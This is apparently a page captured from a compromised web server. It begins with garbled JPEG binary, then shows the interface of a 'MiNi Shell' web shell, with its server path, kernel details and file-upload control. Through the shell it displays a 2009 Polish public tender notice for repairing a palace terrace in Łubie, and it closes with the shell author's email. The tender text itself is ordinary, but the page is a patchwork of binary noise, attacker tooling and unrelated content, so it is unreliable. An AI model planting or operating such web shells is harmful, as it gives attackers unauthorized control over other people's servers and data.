JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090205/18282-N-2009.html

<p class="kh_header"><b>Tarnowskie Góry: Opracowanie dokumentacji i wykonanie robót budowlanych w zakresie remontu posadzki na tarasie budynku Pałacu w Łubiu przy ul. Pyskowickiej 34</b><br>
<b>Numer ogłoszenia: 18282 - 2009; data zamieszczenia: 05.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tarnogórski , ul. Karłuszowiec 5, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3813786, faks 032 3813727.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tarnogorski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji i wykonanie robót budowlanych w zakresie remontu posadzki na tarasie budynku Pałacu w Łubiu przy ul. Pyskowickiej 34.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji - projektu budowlanego wraz z uzyskaniem decyzji o pozwoleniu na budowę i wykonanie robót budowlanych w zakresie remontu posadzki na tarasie budynku Pałacu - siedziby Domu Pomocy Społecznej w Łubiu na podstawie opracowanej dokumentacji w ramach zamówienia. Dokładny adres obiektu do przeprowadzenia remontu tarasu: Dom Pomocy Społecznej w Łubiu, ul. Pyskowicka 34, 42-674 Łubie. Budynek Pałacu znajduje w zespole pałacowo-parkowym wpisanym do rejestru zabytków dawnego województwa katowickiego na mocy decyzji Wojewódzkiego Konserwatora Zabytków w Katowicach z dnia 27.10.1992r. pod nr 1501/92 i z tego względu podlega szczególnej ochronie prawnej, wyrażającej się m.in. w konieczności uzyskania pozwolenia wojewódzkiego konserwatora zabytków na podejmowanie działań, które mogłyby prowadzić do naruszenia substancji lub zmiany wyglądu zabytku wpisanego do rejestru (art. 36 ust. 1  pkt. 11 ustawy o ochronie zabytków i opiece nad zabytkami z dnia 23.07.2003r.). Przedmiot zamówienia w zakresie opracowania dokumentacji obejmuje w szczególności: wykonanie projektu budowlanego 
w zakresie i szczegółowości opracowania niezbędnej do uzyskania pozwolenia na budowę dla przeprowadzenia robót budowlanych remontu tarasu zgodnie z Rozporządzeniem Min. Infrastruktury z 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno-użytkowego (Dz. U. nr 220, poz. 2072); dokumentacja projektowa ma być wykonana na podstawie własnej inwentaryzacji; uzyskanie wszystkich wymaganych opinii, zatwierdzeń, decyzji i uzgodnień m.in. ppoż., bhp, sanitarno-higienicznych, drogowych i innych wymaganych szczegółowymi przepisami; uzyskanie pozwolenia na podejmowanie działań przy zabytku wpisanym do rejestru oraz decyzji o pozwoleniu na budowę; opracowanie szczegółowej specyfikacji technicznej wykonania i odbioru robót w poszczególnych branżach, zawierającej w szczególności wymagania, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje mają być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dn.02.09.2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U Nr 202 z 2004 r. poz. 2072); opracowanie przedmiarów robót scalonych do robót podstawowych (Dz. U. z 2004r., Nr 202   poz. 2072) z odniesieniem do Specyfikacji Technicznej Wykonania i Odbioru Robót (STWiOR);opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (bioz), która ma być wykonana zgodnie z rozporządzeniem Ministra Infrastruktury z dn. 23.06.2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 poz. 1126).Przedmiot zamówienia w zakresie rzeczowym robót budowlanych do wykonania został opisany w programie funkcjonalno użytkowym, który stanowi zał. nr 7 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) i obejmuje: rozbiórkę starej posadzki z lastriko wraz z uszkodzonymi istniejącymi warstwami wodochronnymi i warstwą termiczną; wykonanie nowych warstw spadkowej, wodochronnych i docieplenia oraz nowej posadzki z płytek gresowych lub klinkierowych, antypoślizgowych i mrozoodpornych wraz z cokolikami na przyległych ścianach budynku i wokół filarów balustrady; wymianę uszkodzonych rynien i rur spustowych odwodnienia tarasu. Szczegółowy opis dotyczący przedmiotu zamówienia oraz wymagań przy realizacji zamówienia znajduje się w SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.21.52.10-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział wykonawcy spełniający następujące warunki: 
a) którzy nie podlegają wykluczeniu z postępowania  na podstawie art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień publicznych,
b) którzy spełniają warunki określone w art. 22, ust. 1 ustawy Prawo zamówień publicznych,
c) zrealizowali co najmniej dwa zamówienia obejmujące: opracowanie dokumentacji i realizację robót na jej podstawie, należycie wykonane, w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnych z  przedmiotem zamówienia,
d) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50.000 zł,
e) wskażą 1 - go kierownika prac projektowych i 1 - go kierownika budowy, posiadających stosowne do przedmiotu zamówienia wymagane prawem uprawnienia.
f) udzielą gwarancji na wykonany przedmiot umowy na okres 10 lat (słownie dziesięć), licząc od dnia podpisanego przez Inspektora nadzoru inwestorskiego oraz Zamawiającego i Wykonawcę bezusterkowego protokołu odbioru końcowego robót.Ocena spełnienia wyżej wymienionych warunków dokonana będzie na podstawie oświadczeń i dokumentów, wymienionych w SIWZ, złożonych przez Wykonawcę wraz z ofertą, zgodnie z zasadą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla dokonania oceny spełnienia warunków wyszczególnionych wyżej Wykonawca przedstawi następujące dokumenty:
a. wypełniony, podpisany i opieczętowany przez osobę upoważnioną (osoby upoważnione) do reprezentowania Wykonawcy formularz ofertowy według wzoru stanowiącego załącznik nr 1 do  specyfikacji istotnych warunków zamówienia (SIWZ).
b. zaparafowane lub podpisane i opieczętowane przez osobę upoważnioną (osoby upoważnione) do reprezentowania Wykonawcy istotne postanowienia umowy stanowiące załącznik nr 2 do specyfikacji (SIWZ).
c. aktualny lub uaktualniony odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d. stosowne pełnomocnictwo w przypadku, gdy nie wynika ono z dokumentu dopuszczającego do obrotu lub umowy spółki cywilnej.
e. umowę regulującą współpracę podmiotów występujących wspólnie lub list intencyjny w sprawie wspólnego wykonania zamówienia lub pełnomocnictwo dla lidera podmiotów występujących wspólnie (o ile dotyczy).
f. oświadczenie, iż spełnia warunki określone w art. 22 ust. 1 prawo zamówień publicznych i nie podlega wykluczeniu z art. 24 ust.1 i 2 w/w. Ustawy (załącznik nr 3 do SIWZ).
g. umowę spółki cywilnej, jeśli działalność gospodarcza prowadzona jest w formie spółki cywilnej (w celu identyfikacji stron /wspólników oraz zasad i sposobu reprezentacji spółki).
h. wykaz wykonanych w ciągu ostatnich 5 lat robót budowlanych obejmujących zaprojektowanie i wykonanie robót budowlanych, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnych pod względem rodzaju i wartości z przedmiotem zamówienia, z podaniem ich wartości, daty i miejsca wykonania. Do wykazu załączy co najmniej dwa dokumenty potwierdzające, że usługi projektowe i roboty budowlane zostały wykonane z należytą starannością (wg załącznika nr 4 do SIWZ) celem sprawdzenia warunku, o którym mowa wyżej
i. wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wg zał. nr 5 do SIWZ), ze szczególnym wskazaniem:
-kierownika prac projektowych (imię i nazwisko, kwalifikacje i uprawnienia niezbędne do wykonania zamówienia aktualny wpis do rejestru Inżynierów i Techników Izby Budownictwa, posiadane ubezpieczenie OC wg zał. nr 5a),
-kierownika budowy (imię i nazwisko, kwalifikacje i uprawnienia budowlane niezbędne do wykonania zamówienia, aktualny wpis do rejestru Inżynierów i Techników Izby Budownictwa, posiadane ubezpieczenie OC wg zał. Nr 5b).
Jeżeli w wykazie Wykonawca wskaże osoby, którymi będzie dysponował, składa pisemne zobowiązanie podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.Należy dołączyć dokumenty potwierdzające powyższe.
j. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS/KRUS potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
k. polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności.
l. oświadczenie o podwykonawstwie (jeśli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcom, wg załącznika nr 6 do SIWZ).
m. oświadczenie o okresie udzielanej gwarancji (element formularza ofertowego).
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zamiast dokumentów wyszczególnionych w punkcie c) oraz j) winien przedstawić dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, oraz że nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Termin ważności dokumentów analogicznie jak w pkt c) oraz j).
Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej., można je zastąpić oświadczeniem Wykonawcy, złożonym przed właściwym organem sądowym, administracyjnym, organem samorządu zawodowego lub gospodarczego, albo przed notariuszem kraju, w którym dana osoba ma siedzibę lub miejsce zamieszkania.
Dokumenty i oświadczenia, o których mowa wyżej mają być aktualne lub uaktualnione przez organ je wydający, przedstawione w formie oryginałów lub kopii potwierdzonych za zgodność z oryginałem przez osoby upoważnione do reprezentowania wykonawcy. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
Brak dokumentów wymienionych wyżej spowoduje odrzucenie oferty z zastrzeżeniem art. 26 ust.3 ustawy Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.tarnogorski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Organizacyjny Starostwa Powiatowego w Tarnowskich Górach, ul. Karłuszowiec 5 (pok.101) lub pocztą po otrzymaniu pisemnego wniosku o jej przekazanie. SIWZ jest bezpłatna..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2009 godzina 09:30, miejsce: Zamkniętą kopertę zawierającą ofertę należy złożyć w siedzibie Starostwa Powiatowego, 42-600 Tarnowskie Góry, ul. Karłuszowiec 5 (Kancelaria Starostwa, pok. 1)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Termin wykonania zamówienia: do 30.06.2009 roku. Termin rozpoczęcia prac ustala się na dzień zawarcia umowy.
2.Pracownikami uprawnionymi do kontaktów z wykonawcami są:
- w kwestiach merytorycznych: Jan Ochman, podinspektor Biura ds. Inwestycji  tel. + 48 32 381-37-80;
- w kwestiach formalnych związanych z przetargiem: Iwona Penkaty, główny specjalista w Wydziale Organizacyjnym, tel. +48 32 381-37-86.
3.Otwarcie ofert nastąpi w siedzibie Starostwa Powiatowego w Tarnowskich Górach, ul. Karłuszowiec 5 dnia 26 lutego o godzinie 10:00.
4.Zamawiający nie ustanawia dynamicznego systemu zakupów. 
5.Zamawiający nie przewiduje zawarcia umowy ramowej. 
6.Zamawiający nie dokonuje zamówienia w imieniu innych zamawiających. 
7.Postępowanie jest prowadzone w języku polskim. 
8.Oferta musi być sporządzona w języku polskim w jednym egzemplarzu.
9.Każdy Wykonawca może złożyć tylko jedną ofertę. 
10.Treść oferty musi odpowiadać treści specyfikacji istotnych warunków zamówienia (SIWZ).
11.Oferty składa się pod rygorem nieważności w formie pisemnej. 
12.Zamawiający nie przewiduje zamówień uzupełniających o których mowa w art. 67, ust 1, pkt 6 w ustawie prawo zamówień publicznych. 
13.Oferta winna szczegółowo podawać wyodrębnione koszty: za opracowanie dokumentacji dla pełnego zakresu zamówienia oraz za wykonanie zakresu robót budowlanych ujętych w programie funkcjonalno użytkowym (zakres opisany w pkt. I.3. SIWZ),
14.Postępowanie prowadzone jest w formie pisemnej. Dokumenty, wnioski, zawiadomienia oraz informacje przekazywane za pomocą telefaksu lub drogą elektroniczną uważa się za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona pisemnie.
15.Wykonawca ponosi koszty sporządzenia oferty, w tym także ewentualne koszty tłumaczenia dokumentów czy też oświadczeń załączonych do oferty na język polski.
16.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku ustanawiają pełnomocnika 
do reprezentowania ich w postępowaniu, lub reprezentowania i zawarcia umowy. 
17.Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich.

Creat By MiNi SheLL
Email: jattceo@gmail.com